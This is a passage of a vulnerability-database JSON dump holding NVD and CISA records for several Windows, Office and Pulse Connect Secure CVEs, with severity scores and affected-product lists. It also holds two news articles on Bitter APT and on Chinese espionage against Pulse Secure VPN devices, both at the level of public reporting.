This CVE ID is unique from CVE-2021-27072.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Win32k Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27072", "CVE-2021-28310"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-28310", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-02-09T14:21:05", "description": "Windows Kernel Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31955", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", 
"exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2021-06-10T18:04:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2021-31955", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31955", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:21:06", "description": "Windows NTFS Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, 
"published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31956", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2022-05-03T16:04:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2008:sp2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2021-31956", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31956", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:sp2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:09:10", "description": "Pulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This vulnerability has been exploited in the wild.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-23T17:15:00", "type": "cve", "title": "CVE-2021-22893", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2022-10-24T17:17:00", "cpe": ["cpe:/a:pulsesecure:pulse_connect_secure:9.1", "cpe:/a:pulsesecure:pulse_connect_secure:9.0"], "id": "CVE-2021-22893", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22893", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r6:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8.4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r5:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r9.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r2.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:-:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r11.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.5:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r11.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r11.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r6.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4.1:*:*:*:*:*:*", 
"cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r10.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:-:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r9.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r7:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r10.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r9:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r4.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r5.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r2:*:*:*:*:*:*"]}, {"lastseen": "2023-02-08T15:37:12", "description": "Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka \"Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API.\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-12T14:59:00", "type": "cve", "title": "CVE-2017-0199", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:microsoft:office:2007", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_7:*", "cpe:/a:microsoft:office:2016", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2010", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_vista:*"], "id": "CVE-2017-0199", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0199", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:office:2016:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2007:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2013:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2010:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:14:52", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-28310.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T20:15:00", "type": "cve", "title": "CVE-2021-27072", "cwe": 
["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27072", "CVE-2021-28310"], "modified": "2022-05-03T16:04:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1803"], "id": "CVE-2021-27072", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27072", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:16:20", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-27072.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T20:15:00", "type": "cve", "title": "CVE-2021-28310", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27072", "CVE-2021-28310"], "modified": "2022-05-03T16:04:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803"], "id": "CVE-2021-28310", 
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28310", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}], "thn": [{"lastseen": "2022-05-12T02:22:45", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgx6lZB3oJ9X1sLlKCznoOeSkcDGdxDDzLpQUslIFxcqcdMH_UDcAqH4PjZiqkCxL4jI-B00Zx79nco8uEEf5XiuDqkexKPHK5G1oPT3v5UXngC8t4QHYPLfIhQTOw0d5FZR2WUXYg38_ydmYOd8biQq4tgAK_UHmsEyzslVH8sLV19IMC1QE6NMR95/s728-e100/hacker-code.jpg>)\n\nAn espionage-focused threat actor known for targeting China, Pakistan, and Saudi Arabia has expanded to set its sights on Bangladeshi government organizations as part of an ongoing campaign that commenced in August 2021.\n\nCybersecurity firm Cisco Talos attributed the activity with moderate confidence to a hacking group dubbed the [Bitter APT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat>) based on overlaps in the command-and-control (C2) infrastructure with that of prior campaigns mounted by the same actor.\n\n\"Bangladesh fits the profile we have defined for this threat actor, previously targeting Southeast Asian countries including [China](<https://www.anomali.com/blog/suspected-bitter-apt-continues-targeting-government-of-china-and-chinese-organizations>), Pakistan, and Saudi Arabia,\" Vitor Ventura, lead security researcher at Cisco Talos for EMEA and Asia, [told](<https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html>) The 
Hacker News.\n\n\"And now, in this latest campaign, they have widened their reach to Bangladesh. Any new country in southeast Asia being targeted by Bitter APT shouldn't be of surprise.\"\n\nBitter (aka APT-C-08 or T-APT-17) is suspected to be a South Asian hacking group motivated primarily by intelligence gathering, an operation that's facilitated by means of malware such as BitterRAT, ArtraDownloader, and AndroRAT. Prominent targets include the energy, engineering, and government sectors.\n\nThe earliest attacks distributing the mobile version of BitterRAT date back to September 2014, with the actor having a history of leveraging zero-day flaws \u2014 [CVE-2021-1732](<https://blog.cyble.com/2021/02/24/bitter-apt-enhances-its-capability-with-windows-kernel-zero-day-exploit/>) and [CVE-2021-28310](<https://thehackernews.com/2021/04/nsa-discovers-new-vulnerabilities.html>) \u2014 to its advantage and accomplishing its adversarial objectives.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEje8jC-uVfJtCg-HT90ER0XL1ynji-bMSmKY4TsMgVZDJ4BUis2Ee9BqhaK1IgRgN3C39Ble5vyCaoUWCWOSw_sCPSi1K1pqxhfFDtU7-XFOlKQELXIUmacfXYgeFx_YhnGNvj-1DRRGm2mRliJTxxHv8CqVxw48P0ghcuKJ0YObfTzh23rHBy_Bz3i/s728-e100/talos.jpg>)\n\nThe latest campaign, targeting an elite entity of the Bangladesh government, involves sending spear-phishing emails to high-ranking officers of the Rapid Action Battalion Unit of the Bangladesh police (RAB).\n\nAs is typically observed in other social engineering attacks of this kind, the missives are designed to lure the recipients into opening a weaponized RTF document or a Microsoft Excel spreadsheet that exploits previously known flaws in the software to deploy a new trojan dubbed \"ZxxZ.\"\n\nZxxZ, named so after a separator used by the malware when sending information back to the C2 server, is a 32-bit Windows executable compiled in Visual C++.\n\n\"The trojan masquerades as a Windows Security update service and allows the malicious actor to perform 
remote code execution, allowing the attacker to perform any other activities by installing other tools,\" the researchers explained.\n\nWhile the malicious RTF document exploits a memory corruption vulnerability in Microsoft Office's Equation Editor ([CVE-2017-11882](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>)), the Excel file abuses two remote code execution flaws, [CVE-2018-0798](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0798>) and [CVE-2018-0802](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0802>), to activate the infection sequence.\n\n\"Actors often change their tools to avoid detection or attribution, this is part of the lifecycle of a threat actor showing its capability and determination,\" Ventura said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-11T12:37:00", "type": "thn", "title": "Bitter APT Hackers Add Bangladesh to Their List of Targets in South Asia", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802", "CVE-2021-1732", "CVE-2021-28310"], "modified": "2022-05-12T01:27:46", "id": "THN:75586AE52D0AAF674F942498C96A2F6A", "href": "https://thehackernews.com/2022/05/bitter-apt-hackers-add-bangladesh-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:00", "description": "[](<https://thehackernews.com/images/-5_xyclMz6Yk/YLCbs0h4qJI/AAAAAAAACqc/R6kDUvjXi4UUR6-c9IT_Sv2oMonJRBTOgCLcBGAsYHQ/s0/chinese-hackers.jpg>)\n\nCybersecurity researchers from FireEye unmasked additional tactics, techniques, and procedures (TTPs) adopted by Chinese threat actors who were recently found abusing Pulse Secure VPN devices to drop malicious web shells and exfiltrate sensitive information from enterprise networks.\n\nFireEye's Mandiant threat intelligence team, which is tracking the cyber espionage activity under two activity clusters UNC2630 and UNC2717, [said](<https://www.fireeye.com/blog/threat-research/2021/05/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices.html>) the intrusions line up with key Chinese government priorities, adding \"many compromised organizations operate in verticals and industries aligned with Beijing's strategic objectives outlined in China's recent [14th Five Year Plan](<https://en.wikipedia.org/wiki/Five-year_plans_of_China#Fourteenth_plan_\\(2021%E2%80%932025\\)>).\"\n\nOn April 20, the cybersecurity firm [disclosed](<https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html>) 12 different malware families, including STEADYPULSE and LOCKPICK, that have been designed with the express intent to infect Pulse Secure VPN appliances and put to use by at least two cyber espionage groups believed to be affiliated with the Chinese government.\n\n * 
